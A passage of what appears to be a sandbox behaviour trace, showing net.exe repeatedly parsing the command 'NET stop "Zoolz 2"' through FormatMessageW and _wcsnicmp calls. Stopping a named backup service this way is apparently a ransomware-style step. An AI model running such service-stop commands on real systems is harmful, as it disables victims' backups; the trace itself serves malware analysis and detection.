nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x33 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET SESSION\r\n[\\\\com", _MaxCount=0x13) returned 15 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x234 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET SHARE\r\nsharenam", _MaxCount=0x13) returned 12 [0037.962] LocalFree (hMem=0x7c5828) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x13 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START BROWSER\r\n", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START CLIPBOOK\r", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START EVENTLOG\r", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START MESSENGER", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START NET LOGON", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x16 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START RPCLOCATO", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x11 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START RPCSS\r\n", _MaxCount=0x13) returned 14 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START SCHEDULE\r", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x12 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START SERVER\r\n", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0xf [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START UPS\r\n", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x17 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START WORKSTATI", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x18 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET START\r\n[service", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x2a [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET STATISTICS\r\n[WO", _MaxCount=0x13) returned 14 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET STOP\r\nservice\r\n", _MaxCount=0x13) returned 19 [0037.963] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x58 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET TIME\r\n\r\n[\\\\comp", _MaxCount=0x13) returned -1 [0037.963] LocalFree (hMem=0x7c5828) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x184 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET USE\r\n[devicenam", _MaxCount=0x13) returned -2 [0037.963] LocalFree (hMem=0x7c5828) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xc7 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET USER\r\n[username", _MaxCount=0x13) returned -2 [0037.963] LocalFree (hMem=0x7c5828) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x47 [0037.963] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET VIEW\r\n[\\\\comput", _MaxCount=0x13) returned -3 [0037.963] LocalFree (hMem=0x7c5828) returned 0x0 [0037.963] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xc2 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET\r\n [ ACCOUNTS", _MaxCount=0x13) returned 19 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x319 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="SERVICES\r\nNET START", _MaxCount=0x13) returned -5 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x483 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="SYNTAX\r\nThe followi", _MaxCount=0x13) returned -5 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xa86 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NAMES\r\nThe followin", _MaxCount=0x13) returned 4 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x54 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="\r\nFor more informat", _MaxCount=0x13) returned 97 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xad [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET ACCOUNTS\r\n[/F", _MaxCount=0x11) returned 18 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x2e [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET COMPUTER\r\n\\\\c", _MaxCount=0x11) returned 16 [0037.964] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x7d [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET CONFIG SERVER", _MaxCount=0x11) returned 16 [0037.964] LocalFree (hMem=0x7c5828) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x26 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET CONFIG\r\n[SERV", _MaxCount=0x11) returned 16 [0037.964] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET CONTINUE\r\nser", _MaxCount=0x11) returned 16 [0037.964] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x1b [0037.964] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET FILE\r\n[id [/C", _MaxCount=0x11) returned 13 [0037.964] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xbe [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET GROUP\r\n[group", _MaxCount=0x11) returned 12 [0037.965] LocalFree (hMem=0x7c5828) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x33 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET HELP\r\ncommand", _MaxCount=0x11) returned 11 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET HELPMSG\r\nmess", _MaxCount=0x11) returned 11 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xc1 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET LOCALGROUP\r\n[", _MaxCount=0x11) returned 7 [0037.965] LocalFree (hMem=0x7c5828) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x16 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET PAUSE\r\nservic", _MaxCount=0x11) returned 3 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x33 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET SESSION\r\n[\\\\c", _MaxCount=0x11) returned 15 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x234 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET SHARE\r\nsharen", _MaxCount=0x11) returned 12 [0037.965] LocalFree (hMem=0x7c5828) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x13 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START BROWSER", _MaxCount=0x11) returned 14 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START CLIPBOO", _MaxCount=0x11) returned 14 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START EVENTLO", _MaxCount=0x11) returned 14 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START MESSENG", _MaxCount=0x11) returned 14 [0037.965] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.965] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START NET LOG", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x16 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START RPCLOCA", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x11 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START RPCSS\r\n", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START SCHEDUL", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x12 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START SERVER\r", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0xf [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START UPS\r\n", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x17 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START WORKSTA", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x18 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET START\r\n[servi", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x2a [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET STATISTICS\r\n[", _MaxCount=0x11) returned 14 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET STOP\r\nservice", _MaxCount=0x11) returned 19 [0037.966] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6㼸|6") returned 0x58 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET TIME\r\n\r\n[\\\\co", _MaxCount=0x11) returned -1 [0037.966] LocalFree (hMem=0x7c9828) returned 0x0 [0037.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0x184 [0037.966] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET USE\r\n[devicen", _MaxCount=0x11) returned -2 [0037.966] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0xc7 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET USER\r\n[userna", _MaxCount=0x11) returned -2 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0x47 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET VIEW\r\n[\\\\comp", _MaxCount=0x11) returned -3 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0xc2 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NET\r\n [ ACCOUN", _MaxCount=0x11) returned 19 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0x319 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="SERVICES\r\nNET STA", _MaxCount=0x11) returned -5 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0x483 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="SYNTAX\r\nThe follo", _MaxCount=0x11) returned -5 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0xa86 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="NAMES\r\nThe follow", _MaxCount=0x11) returned 4 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0x54 [0037.967] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz", _String2="\r\nFor more inform", _MaxCount=0x11) returned 97 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6頨|6") returned 0xad [0037.967] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0037.967] LocalFree (hMem=0x7c9828) returned 0x0 [0037.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6頨|6") returned 0x2e [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0037.968] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="頨|⡋瓢6㼸|6") returned 0x7d [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0037.968] LocalFree (hMem=0x7c9828) returned 0x0 [0037.968] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6頨|6") returned 0x26 [0037.968] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0037.968] LocalFree 